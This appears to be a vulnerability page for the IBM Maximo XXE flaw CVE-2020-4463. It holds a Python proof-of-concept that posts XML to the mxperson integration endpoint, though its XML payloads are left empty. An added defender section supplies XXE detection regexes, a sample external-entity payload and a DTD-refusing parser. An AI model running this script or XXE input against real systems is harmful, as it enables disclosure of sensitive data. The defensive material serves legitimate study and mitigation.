# IBM Maximo Asset Management XXE Vulnerability (CVE-2020-4463)

When processing XML data, IBM Maximo Asset Management is vulnerable to XML External Entity (XXE) injection. A remote attacker could exploit this vulnerability to disclose sensitive information or consume memory resources.

Affected core components:

* IBM Maximo Asset Management 7.6.0
* IBM Maximo Asset Management 7.6.1
* All versions of IBM Maximo Asset Management before 7.6.0

CVE-2020-4463 PoC:

```python
#!/usr/bin/python3
############
# @Author Ibonok
#
# CVE-2020-4463 IBM Maximo XXE
#
# Do not use this in production environments.
# For educational use only.
#
############

from colorama import init, Fore, Style
import sys
import requests
import argparse


def dataeleak_example(url):
    # Mandatory headers
    headers = {'Content-Type': 'application/xml'}
    basepath = "/meaweb/os/mxperson"

    # DUMP MXPERSON: XML request body (not preserved on this page)
    xml_query = """
    """

    print(requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)


def xxe_example(url):
    # Mandatory headers
    headers = {'Content-Type': 'application/xml'}
    basepath = "/meaweb/os/mxperson"

    # XXE Windows: XML request body (not preserved on this page)
    xml_query = """
    """

    print(requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)

    # XXE Linux: XML request body (not preserved on this page)
    xml_query = """
    """

    print(requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)


def check_args():
    init(autoreset=True)
    pars = argparse.ArgumentParser(description=Fore.GREEN + Style.BRIGHT + 'CVE-2020-4463 PoC Data Leakage and XXE' + Style.RESET_ALL)

    pars.add_argument('-x', '--xxe', nargs='?', type=str2bool, default=False, const=True, help='XXE (Linux/Windows)')
    pars.add_argument('-d', '--dataleak', nargs='?', type=str2bool, default=False, const=True, help='Data Leakage REST request MXPERSON. May take a long time.')
    pars.add_argument('--url', nargs='?', help='Target URL http://, https://')

    args = pars.parse_args()

    if args.url is None:
        pars.error(Fore.RED + '--url required')
    elif args.xxe and args.dataleak:
        # Both modes at once are rejected before the single-mode checks
        pars.error(Fore.RED + 'Too many parameters, please check --help')
    elif not args.xxe and not args.dataleak:
        pars.error(Fore.RED + '-x/--xxe or -d/--dataleak is missing')
    return args.url, args.xxe, args.dataleak


def single_url(url, xxe, dataleak):
    if dataleak:
        dataeleak_example(url)
    elif xxe:
        xxe_example(url)
    else:
        sys.exit()


def str2bool(v):
    # Accept the usual truthy/falsy spellings for the optional flag values
    if isinstance(v, bool):
        return v
    if v.lower() in ('yes', 'true', 't', 'y', '1'):
        return True
    elif v.lower() in ('no', 'false', 'f', 'n', '0'):
        return False
    else:
        raise argparse.ArgumentTypeError('Boolean value expected.')


if __name__ == "__main__":
    try:
        (url, xxe, dataleak) = check_args()
        single_url(url, xxe, dataleak)
    except KeyboardInterrupt:
        sys.exit()
```

If you receive the following response, neither vulnerability is present:

Error 500: BMXAA1268E – No user credentials.
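As an added defender-side example (not part of the PoC above or of IBM's code), the following Python flags XML posted to the /meaweb/os/ integration path for DTD and external-entity indicators, and shows the parse-side mitigation of refusing any document that carries a DTD before it reaches the parser. The sample request bodies, the QueryMXPERSON element names and the file:///placeholder URI are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Indicators: a DTD, an external (SYSTEM/PUBLIC) entity declaration, a custom entity reference.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
ENTITY_REF_RE = re.compile(r"&(?!(?:lt|gt|amp|quot|apos|#\d+|#x[0-9a-fA-F]+);)[A-Za-z_][\w.-]*;")

# Constructed sample bodies (element names are illustrative, not IBM's schema).
BENIGN_BODY = '<?xml version="1.0"?><QueryMXPERSON><MXPERSONQuery/></QueryMXPERSON>'
SUSPECT_BODY = ('<?xml version="1.0"?>\n'
                '<!DOCTYPE q [<!ENTITY xxe SYSTEM "file:///placeholder">]>\n'
                '<QueryMXPERSON><MXPERSONQuery>&xxe;</MXPERSONQuery></QueryMXPERSON>')


def xxe_indicators(body):
    """Return the set of XXE indicators present in a raw XML request body."""
    found = set()
    if DOCTYPE_RE.search(body):
        found.add("doctype")
    if EXT_ENTITY_RE.search(body):
        found.add("external_entity")
    if ENTITY_REF_RE.search(body):
        found.add("custom_entity_ref")
    return found


def triage_request(path, content_type, body):
    """Flag XML posted to the integration path (/meaweb/os/...) for XXE review.

    Requests to other paths, or without an XML content type, yield an empty set.
    """
    if not path.startswith("/meaweb/os/") or "xml" not in (content_type or "").lower():
        return set()
    return xxe_indicators(body)


def parse_without_dtd(body):
    """Parse-side mitigation: refuse any document carrying a DTD before parsing it."""
    if DOCTYPE_RE.search(body):
        raise ValueError("DTD not allowed in inbound XML")
    return ET.fromstring(body)


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        print(name, sorted(triage_request("/meaweb/os/mxperson", "application/xml", body)))
```

The same DOCTYPE gate applies to any XML the integration framework accepts, not only the mxperson object structure.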

ref:

https://github.com/Ibonok/CVE-2020-4463

https://forum.ywhack.com/thread-114787-1-3.html
